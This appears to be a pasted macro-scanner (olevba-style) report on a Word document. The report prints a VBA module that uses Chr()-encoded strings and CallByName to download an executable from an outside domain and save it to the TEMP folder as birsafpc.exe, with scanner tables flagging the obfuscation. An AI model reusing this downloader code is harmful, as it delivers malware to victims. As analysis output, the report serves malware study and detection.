  978. +------------+---------+-----------------------------------------+
  979. | Suspicious | Chr     | May attempt to obfuscate specific       |
  980. |            |         | strings                                 |
  981. +------------+---------+-----------------------------------------+
  982. -------------------------------------------------------------------------------
  983. VBA MACRO Module4.bas
  984. in file: 1913.doc - OLE stream: u'Macros/VBA/Module4'
  985. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  986. 'Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long
  987. 'Declare Function GetDiskFreeSpace Lib "kernel32" Alias "GetDiskFreeSpaceA" (ByVal lpRootPathName As String, lpSectorsPerCluster As Long, lpBytesPerSector As Long, lpNumberOfFreeClusters As Long, lpTotalNumberOfClusters As Long) As Long
  988. '
  989. ' Constants used with GetDriveType result
  990. '
  991. Public Const DRIVE_REMOVABLE = 2
  992. Public Const DRIVE_FIXED = 3
  993. Public Const DRIVE_REMOTE = 4
  994. Public Const DRIVE_CDROM = 5
  995. Public Const DRIVE_RAMDISK = 6
  996. '
  997. ' This Type is used to hold properties of the open documents
  998. '
  999. Type BackupDoc
  1000.     Name As String
  1001.     Path As String
  1002.     State As String
  1003.     Size As Long
  1004.     Selected As Boolean
  1005. End Type
  1006. '
  1007. ' Use this procedure to display the Backup form
  1008. '
  1009. Sub ShowBackup()
  1010.     '
  1011.    ' Ignore the error that occurs if this procedure is
  1012.    ' executed while the form is already displayed.
  1013.    '
  1014.    On Error Resume Next
  1015.     frmBackup.Show
  1016.     Set frmBackup = Nothing
  1017. End Sub
  1018. Sub HOPPOJJ2222()
  1019.  
  1020. Set HOPPOJJ2233 = HOPPOJJ1155("M" & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & "o" & Chr(102) & "t" & "." & Chr(88) & Chr(77) & Chr(76) & Chr(72) & "T" & Chr(84) & Chr(80))
  1021.    
  1022. CallByName HOPPOJJ2233, Chr(79) & Chr(112) & "e" & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), Chr(104) & "t" & "t" & "p" & Chr(58) & Chr(47) & "/" & Chr(111) & Chr(97) & Chr(107) & Chr(119) & Chr(105) & Chr(110) & Chr(100) & Chr(111) & Chr(119) & "s" & Chr(97) & Chr(110) & Chr(100) & "d" & Chr(111) & Chr(111) & Chr(114) & Chr(115) & Chr(46) & "c" & Chr(111) & Chr(109) & Chr(47) & Chr(52) & "2" & Chr(47) & Chr(49) & "1" & Chr(46) & Chr(101) & "x" & Chr(101), False
  1023. Set HOPPOJJ2244 = HOPPOJJ1155("W" & "S" & Chr(99) & "r" & "i" & Chr(112) & "t" & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & "l")
  1024.  
  1025. Set HOPPOJJ2255 = CallByName(HOPPOJJ2244, Chr(69) & Chr(110) & Chr(118) & Chr(105) & "r" & Chr(111) & Chr(110) & Chr(109) & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
  1026.  
  1027. HOPPOJJ2266 = HOPPOJJ2255("T" & Chr(69) & Chr(77) & "P")
  1028.  
  1029. HOPPOJJ2211 = HOPPOJJ2266 & Chr(92) & Chr(98) & Chr(105) & "r" & Chr(115) & Chr(97) & "f" & Chr(112) & "c.e" & Chr(120) & Chr(101)
  1030. Dim HOPPOJJ2277() As Byte
  1031.  
  1032. CallByName HOPPOJJ2233, Chr(83) & "e" & Chr(110) & Chr(100), VbMethod
  1033. HOPPOJJ2277 = CallByName(HOPPOJJ2233, "r" & Chr(101) & Chr(115) & Chr(112) & Chr(111) & Chr(110) & Chr(115) & Chr(101) & Chr(66) & Chr(111) & Chr(100) & Chr(121), VbGet)
  1034. HOPPOJJ1177 HOPPOJJ2277, HOPPOJJ2211
  1035. On Error GoTo HOPPOJJ2288
  1036.     a = 129 / 0
  1037.   On Error GoTo 0
  1038.  
  1039. HOPPOJJ2299:
  1040.   Exit Sub
  1041. HOPPOJJ2288:
  1042.   HOPPOJJ1122 ("Ki8JfHxWCPDg")
  1043. Resume HOPPOJJ2299
  1044. End Sub
  1045. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1046. ANALYSIS:
  1047. +------------+----------------+-----------------------------------------+
  1048. | Type       | Keyword        | Description                             |
  1049. +------------+----------------+-----------------------------------------+
  1050. | Suspicious | Open           | May open a file                         |
  1051. | Suspicious | Chr            | May attempt to obfuscate specific       |
  1052. |            |                | strings                                 |
  1053. | Suspicious | Lib            | May run code from a DLL                 |
  1054. | Suspicious | CallByName     | May attempt to obfuscate malicious      |
  1055. |            |                | function calls                          |
  1056. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  1057. |            |                | may be used to obfuscate strings        |
  1058. |            |                | (option --decode to see all)            |
  1059. +------------+----------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top